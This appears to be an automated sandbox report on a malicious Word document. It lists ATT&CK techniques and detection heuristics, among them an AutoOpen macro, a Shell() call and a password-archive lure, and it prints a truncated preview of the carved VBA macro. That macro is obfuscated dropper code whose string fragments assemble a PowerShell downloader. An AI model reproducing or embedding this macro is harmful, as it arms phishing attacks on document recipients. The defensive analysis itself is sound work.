MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains VBA macros with an AutoOpen function and a Shell() call, indicating malicious intent. The embedded URL 'http://Ftn+FtnmGts+GtsetriFtn+FtH8SAf' is likely used to download a second-stage payload. The heuristic 'Password-protected archive handoff' suggests the document is designed to trick users into providing a password, often to bypass security scans, aligning with a phishing lure.
Heuristics 6
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LUREDocument gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://Ftn+FtnmGts+GtsetriFtn+FtH8SAf In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 78850 bytes |
SHA-256: 1bf97fb096d56cb301ae0d1bafb165aa2ba1aa03976953686e2f651b981c6e70 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "CSBawElibM"
Function fIMEWzP()
On Error Resume Next
FLHbWri = zRHbJEbSqDJVD - CBool(zvzTiiGkjjZRf) * 216045258 / Sqr(jaXNXqqALdVpUQ) + SPhBNpVkSKsjOi / Atn(9898) * BsYjlPjwzNA - CDate(376) - jVwsJqmQRsPSFL / 3 + EDfJcRkccRoij / SkoNslOTRjpc
EhQzSKtoEn = tvJXicwuYrHPp - CBool(JLiDwpinSmm) * 216045258 / Sqr(folTzdZ) + NEjoHPAMOP / Atn(9898) * hPOEwbapZEFd - CDate(376) - kjzKJFuiqS / 3 + EftwioVYD / FmQjmsW
zsmjQAqtl = KGApMqszHnHoz + Mid("vZHnwApAF8wjIhqOsbuqqJm8q44BWwElUuasd = Ftn+FtnneFtn+FtnGts+Gt'+'sw-oGts+Gtsbject Ftn+FtnrandoFtn+Ft'+'nm;LAFtn+FtnwFtn+FiXqzl", 35, 87) + uNKKinP
qlcvM = JJcGbaZbt - CBool(DYiwtVbVM) * 216045258 / Sqr(iwHbEMZ) + llvTAzbSALM / Atn(9898) * KKZRlpN - CDate(376) - UwpOdYnLBBBP / 3 + zqHWjXf / bVQIItTYqp
vHkhEvX = IjApjdAQf - CBool(DiFwXwp) * 216045258 / Sqr(lhzvZQtjU) + iiVlPzqoiarJz / Atn(9898) * womdSDDiPUw - CDate(376) - QMHkvwIKlAiSSF / 3 + iUOYciZ / kiPQQmAOBoSjdj
jklzOus = RiPtcZF - CBool(fTmLLlQNpD) * 216045258 / Sqr(otwSHKWG) + FjwGvowQ / Atn(9898) * OKWcVvsiFm - CDate(376) - hpXRFGIUPH / 3 + FStPzVfQXmzq / spMYAadEjhi
HYFbMb = wmHmvhqbM + Mid("LR3IAiXShEXzWIKMjOiQa+FtncFtn+Ftnh(LFtn+FtnAwFtn'+'+FtnabFtn+FtncFtn+Ftn iFtn+Ftnn LFtn+FtnAwbFtn+FtncdrG", 22, 82) + QwJzDNURu
MajpDGD = fuAoovFTLNzUJA - CBool(TOrNWGffsYkljd) * 216045258 / Sqr(WcBajic) + kDfKEDTRrOGUD / Atn(9898) * QKnzPIQDJYqKr - CDate(376) - SiRRrVGJrv / 3 + bYGtXaIwiMr / jPTdjtGUuMwwI
VBVZNwHV = qHXSAzMaalm - CBool(WDWLHELi) * 216045258 / Sqr(UkwOKWn) + HZiozcwE / Atn(9898) * zAiLFtAKrmpFJD - CDate(376) - UcWXZDpaYR / 3 + MEVWaZHJGK / qOqwETjwDzWLTX
mEobvjPdIvK = hPaHlblfOtG - CBool(vKbkTWHHnj) * 216045258 / Sqr(pXNOmFpLqhRrXI) + YKMBzTC / Atn(9898) * zXanYDI - CDate(376) - nAPljYNzaYh / 3 + rdTEbRwzv / jfmVNqLRRIhD
QHzlvECWC = odilGSsYnjJJlw + Mid("fRYIMbVQinU8NkSt12pLwuW5TnR.Ftn+FtGts+GtsnSpliFtn+Ftnt(m9R,Ftn+Ftnm9R);LAwkFtn+FtnarapaFtn+FtnsFtn+FtGts+Gtsn FtGts+Gtsn+Ftn= LAwnsadasd.nFtn+Ftnext(1Gts+Gt'+'sFtn+Gts+GtsFtn, 34FR9RK", 26, 154) + NMIbviCYsZQl
XqDqlBtqMYL = ZfuIZJtl - CBool(woVMQwAwLVlH) * 216045258 / Sqr(bzWqaOWqsCwT) + bOwlpwc / Atn(9898) * BPwXiEzZ - CDate(376) - wlzrEvl / 3 + jfPrDmWsPWmz / fpiYZjXTsJY
ANEBYHXh = vfpBjNzAtEsvX - CBool(ucdFTlvItOso) * 216045258 / Sqr(EBFodJCdmRLFV) + cCNwRGzS / Atn(9898) * trwEwmlbJ - CDate(376) - UswnQPmVEILSA / 3 + ZSGjRaiullLwjE / rApBMBS
SznnXGv = KbZTwVSiLOOr - CBool(raLiKXHzTk) * 216045258 / Sqr(YYRHbGvoZb) + oSkQzpsGw / Atn(9898) * PuWqmuRHLiqrC - CDate(376) - YDKDESaRucltwt / 3 + RGNljJdvRp / dhNsXzPp
iCzDiU = sDMUIXSNC + Mid("6aFkjQC9nbiJjjFZX6]110),[stRINg][CHAr]39KRn2CN4", 19, 22) + RNRzcbfS
kOcmT = OwjfkuKEbrz - CBool(djFJiJaHMbT) * 216045258 / Sqr(hONIVQnvGorj) + vzzajkFjacKu / Atn(9898) * SDbLRmdzzVhC - CDate(376) - LDEXpoWXnLaj / 3 + rOCGlCNozkT / WFFozbSYzZBcCn
kvrONJbas = BrmQNljnp - CBool(UJOqdCVTVBvHL) * 216045258 / Sqr(nLwhUfzTh) + lXuTuisLjjEcvS / Atn(9898) * NnzSrWtjXdC - CDate(376) - zSKsAcREFHCZr / 3 + jXfKKQfD / szAparrX
CVNHuTiGhwv = IHhSMaEwfpfS - CBool(SQkKqtHsnjDLi) * 216045258 / Sqr(aUnGZqHtWDcCU) + lzwOvaSLiYap / Atn(9898) * rUYiGdiddsiF - CDate(376) - lZtjhoZUGok / 3 + QIZPmOjjIPYwZ / ZlJIHQJTos
wBwJFtqqlNj = XJfrBilvPu + Mid("l).reP'+'lacE(Gt3tXPnlfkMhf", 2, 15) + jiouNTkcSjQjp
CSzfp = sqssZnDAdNXGk - CBool(binWBMSlHv) * 216045258 / Sqr(RuzmrMOk) + hAQrwrHK / Atn(9898) * SfAHXZHmVqKX - CDate(376) - jwjHsDN / 3 + AIVXsaSwXJFH / pQKKXafErYZoaR
YFVLiJR = VusuIrODdH - CBool(scIWHiuwwPr) * 216045258 / Sqr(nXJqklLAO) + CboWNnhQiWA / Atn(9898) * coLrsWDYDIdhEW - CDate(376) - BiRSHQOajhlQHR / 3 + hVMrvUistowq / tzHRrnflREt
ALfGjCNTos = VdiiJkviSJzljJ - CBool(KAXufZr) * 216045258 / Sqr(qNtsUYUXmou) + aNQImjBMppE / Atn(9898) * XDFGWmqXd - CDate(376) - sVPsaJw / 3 + MzmiawjOIvYf / AIbURTNAAzXB
YkjMQ = KrzDwzRWf + Mid("N8tnbFtn
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.